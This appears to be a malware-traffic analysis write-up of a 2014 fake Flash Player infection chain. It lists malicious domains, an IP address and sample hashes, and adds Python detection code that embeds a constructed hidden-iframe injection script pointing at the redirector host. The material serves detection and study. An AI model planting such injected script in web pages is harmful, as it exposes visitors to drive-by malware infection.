2014-04-30 - FAKE FLASH PLAYER FROM 87.98.146.123 - ACTIVEX.ADOBE.FLASH.PLAYER.TRANSDISCIPLINAR.INFO

ASSOCIATED FILES:

NOTES:

 

CHAIN OF EVENTS

COMPROMISED WEBSITE AND REDIRECT:

FAKE FLASH PLAYER PAGE:

POST-INFECTION CALLBACK FROM SANDBOX ANALYSIS:

 

PRELIMINARY MALWARE ANALYSIS

File name:  adobe_flash_player.exe
File size:  13.5 KB (13,824 bytes)
MD5 hash:  f5f998a2425a559be2d6413d16ad091d
SHA256 hash:  2417424e64f2f1499b3d9dc2c8b5ebde92ffa6aa43984564478000a9775747b3
Detection ratio:  46 / 52
First submission:  2014-04-28 09:47:44 UTC
VirusTotal link:  https://www.virustotal.com/en/file/2417424e64f2f1499b3d9dc2c8b5ebde92ffa6aa43984564478000a9775747b3/analysis/
Malwr link:  https://malwr.com/analysis/ZTM0ZDEwMTg5NzRjNGM4ZTg5YjAyZTFmMjBjOTc4NTc/

 

SNORT EVENTS

SNORT EVENTS FOR THE INFECTION TRAFFIC (from Sguil on Security Onion)

 

NOTE:  Using Security Onion, I ran tcpreplay on a sandbox analysis PCAP of the malware.  The PCAP generated two different post-infection alerts.

 

SCREENSHOTS FROM THE TRAFFIC

Here's the JavaScript I've seen from the compromised websites.  Note the <HTML> and </HTML> tags...  It looks like a separate HTML page before the start of the actual HTML page from the site.

 

The JavaScript shown above generated the HTTP GET request seen below to pagerank.net.au, which in turn sends traffic to the fake Flash player page on transdisciplinar.info.
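The "separate HTML page in front of the real page" pattern is easy to check for mechanically when you have the response body from a PCAP. The following is an added example (not code from this write-up, and not the injected script itself, which is only shown in the screenshot): it looks for a complete <html>...</html> document that closes before a second <html> opens, counts the script tags inside it and pulls out the external hosts it references. The sample page, the script body and the path on pagerank.net.au are constructed for the example; only the redirect host comes from the write-up.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample modelled on the pattern described above: a complete
# <html>...</html> block containing only a script, prepended to the site's real
# page. The script body and the redirect path are hypothetical; the write-up
# only shows that the injected code produces a GET to pagerank.net.au.
INJECTED_PAGE = """<html>
<script type="text/javascript">
var f = document.createElement("iframe");
f.src = "http://pagerank.net.au/example-path";
f.style.visibility = "hidden";
document.write(f.outerHTML);
</script>
</html>
<!DOCTYPE html>
<html>
<head><title>Compromised site</title></head>
<body><p>Normal page content.</p></body>
</html>
"""

# Constructed clean page for comparison: a single <html> block.
CLEAN_PAGE = """<!DOCTYPE html>
<html>
<head><title>Clean site</title></head>
<body><p>Normal page content.</p></body>
</html>
"""

HTML_OPEN = re.compile(r"<html\b[^>]*>", re.IGNORECASE)
HTML_CLOSE = re.compile(r"</html\s*>", re.IGNORECASE)
SCRIPT_OPEN = re.compile(r"<script\b", re.IGNORECASE)
URL_HOST = re.compile(r"https?://([a-z0-9.-]+)", re.IGNORECASE)


@dataclass
class PrependedBlock:
    text: str                      # the whole prepended <html>...</html> block
    script_count: int              # number of <script> tags inside it
    hosts: List[str] = field(default_factory=list)  # external hosts referenced by the block


def find_prepended_html(body: str) -> Optional[PrependedBlock]:
    """Return the leading <html>...</html> block if a second <html> document follows it.

    A legitimate page has exactly one <html> element. Two, where the first is
    closed before the second opens, is the signature described in the write-up:
    an injected document sitting in front of the site's own page.
    """
    opens = [m.start() for m in HTML_OPEN.finditer(body)]
    if len(opens) < 2:
        return None
    close = HTML_CLOSE.search(body, opens[0])
    if close is None or close.end() > opens[1]:
        # The first <html> never closes, or closes only after the second
        # opens: not a prepended document, just malformed markup.
        return None
    block = body[opens[0]:close.end()]
    hosts = sorted({h.lower() for h in URL_HOST.findall(block)})
    return PrependedBlock(text=block,
                          script_count=len(SCRIPT_OPEN.findall(block)),
                          hosts=hosts)


def is_injection_candidate(block: Optional[PrependedBlock]) -> bool:
    """Flag a prepended block that carries script and points at an external host."""
    return block is not None and block.script_count > 0 and len(block.hosts) > 0


if __name__ == "__main__":
    for name, page in (("injected", INJECTED_PAGE), ("clean", CLEAN_PAGE)):
        found = find_prepended_html(page)
        print(name, "->", "candidate" if is_injection_candidate(found) else "no prepended block",
              found.hosts if found else "")
```

The host list is what you feed into the next step: any host that is neither the compromised site nor one of its normal third parties is the redirector to chase in the PCAP.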

 

Here's the GET request for the fake Flash player from activex.adobe.flash.player.transdisciplinar.info

 

Post-infection callback to nonicnic.net

 

Post-infection callback to mobypapp.com
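The whole chain above (compromised site, redirect through pagerank.net.au, fake Flash player page, EXE download, then the two callbacks the Snort alerts fired on) can be reconstructed from HTTP requests by walking Referer headers backwards from the executable download. The following is an added example, not code from this write-up: the hostnames and the SHA256 of the sample are the indicators listed on this page, while the compromised site's name, the URI paths and the response bodies are constructed (the "executable" is a stub MZ header, so the hash check reports it as not the known sample). The lookalike-host check is a simple label match and is an assumption of this example, not a rule from the write-up.

```python
import hashlib
from typing import Dict, List, Optional

# Indicators taken from this write-up.
FAKE_FLASH_HOST = "activex.adobe.flash.player.transdisciplinar.info"
REDIRECTOR_HOST = "pagerank.net.au"
CALLBACK_HOSTS = {"nonicnic.net", "mobypapp.com"}
KNOWN_SHA256 = {"2417424e64f2f1499b3d9dc2c8b5ebde92ffa6aa43984564478000a9775747b3"}

# Constructed HTTP records modelled on the chain described above. The
# compromised site's name, the URI paths and the response bodies are
# hypothetical; only the hostnames and the sample hash come from the write-up.
REQUESTS: List[Dict] = [
    {"method": "GET", "host": "www.compromised-example.com", "path": "/",
     "referer": None, "body": b"<html>site content</html>"},
    {"method": "GET", "host": REDIRECTOR_HOST, "path": "/redirect",
     "referer": "http://www.compromised-example.com/", "body": b"<html>redirect</html>"},
    {"method": "GET", "host": FAKE_FLASH_HOST, "path": "/",
     "referer": "http://pagerank.net.au/redirect", "body": b"<html>fake flash player page</html>"},
    {"method": "GET", "host": FAKE_FLASH_HOST, "path": "/adobe_flash_player.exe",
     "referer": "http://activex.adobe.flash.player.transdisciplinar.info/",
     "body": b"MZ\x90\x00" + b"\x00" * 60},   # stub PE header, not the real sample
    {"method": "POST", "host": "nonicnic.net", "path": "/", "referer": None, "body": b""},
    {"method": "GET", "host": "mobypapp.com", "path": "/", "referer": None, "body": b""},
]


def url_of(record: Dict) -> str:
    return "http://{}{}".format(record["host"], record["path"])


def is_lookalike_adobe_host(host: str) -> bool:
    """True when a hostname uses 'adobe' or 'flash' as a label but is not under adobe.com."""
    host = host.lower().rstrip(".")
    if host == "adobe.com" or host.endswith(".adobe.com"):
        return False
    return bool({"adobe", "flash"} & set(host.split(".")))


def classify(record: Dict) -> List[str]:
    """Tag one request with the roles it plays in the chain."""
    tags = []
    host = record["host"].lower()
    if host == REDIRECTOR_HOST:
        tags.append("redirector")
    if is_lookalike_adobe_host(host):
        tags.append("lookalike-adobe-host")
    if record["body"][:2] == b"MZ":            # response is a PE executable
        tags.append("pe-download")
        if is_lookalike_adobe_host(host):
            tags.append("fake-flash-player")
        if hashlib.sha256(record["body"]).hexdigest() in KNOWN_SHA256:
            tags.append("known-sample")
    if host in CALLBACK_HOSTS:
        tags.append("post-infection-callback")
    return tags


def redirect_chain(records: List[Dict], target: Dict) -> List[str]:
    """Walk Referer headers backwards from `target`; returns URLs oldest first."""
    by_url = {url_of(r): r for r in records}
    chain = [url_of(target)]
    seen = set(chain)
    current: Optional[Dict] = target
    while current is not None and current.get("referer"):
        ref = current["referer"]
        if ref in seen:                        # guard against referer loops
            break
        chain.append(ref)
        seen.add(ref)
        current = by_url.get(ref)              # None if the referer was not captured
    return list(reversed(chain))


def analyze(records: List[Dict]) -> List[Dict]:
    """One report entry per fake Flash player download found in the records."""
    callbacks = sorted({r["host"].lower() for r in records
                        if "post-infection-callback" in classify(r)})
    return [{"url": url_of(r), "chain": redirect_chain(records, r),
             "known_sample": "known-sample" in classify(r), "callbacks": callbacks}
            for r in records if "fake-flash-player" in classify(r)]


if __name__ == "__main__":
    for entry in analyze(REQUESTS):
        print("fake Flash player download:", entry["url"])
        print("  chain:", " -> ".join(entry["chain"]))
        print("  callbacks:", ", ".join(entry["callbacks"]))
```

Two things worth keeping from this layout when you script it against real PCAP exports: the chain walk stops cleanly when a Referer points at a request you did not capture (the chain still records that URL), and the executable check keys on the MZ magic in the response rather than on the .exe extension, which the delivery page controls.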

 

FINAL NOTES

Once again, here are links for the associated files:

ZIP files are password-protected with the standard password.  If you don't know it, look at the "about" page of this website.

Click here to return to the main page.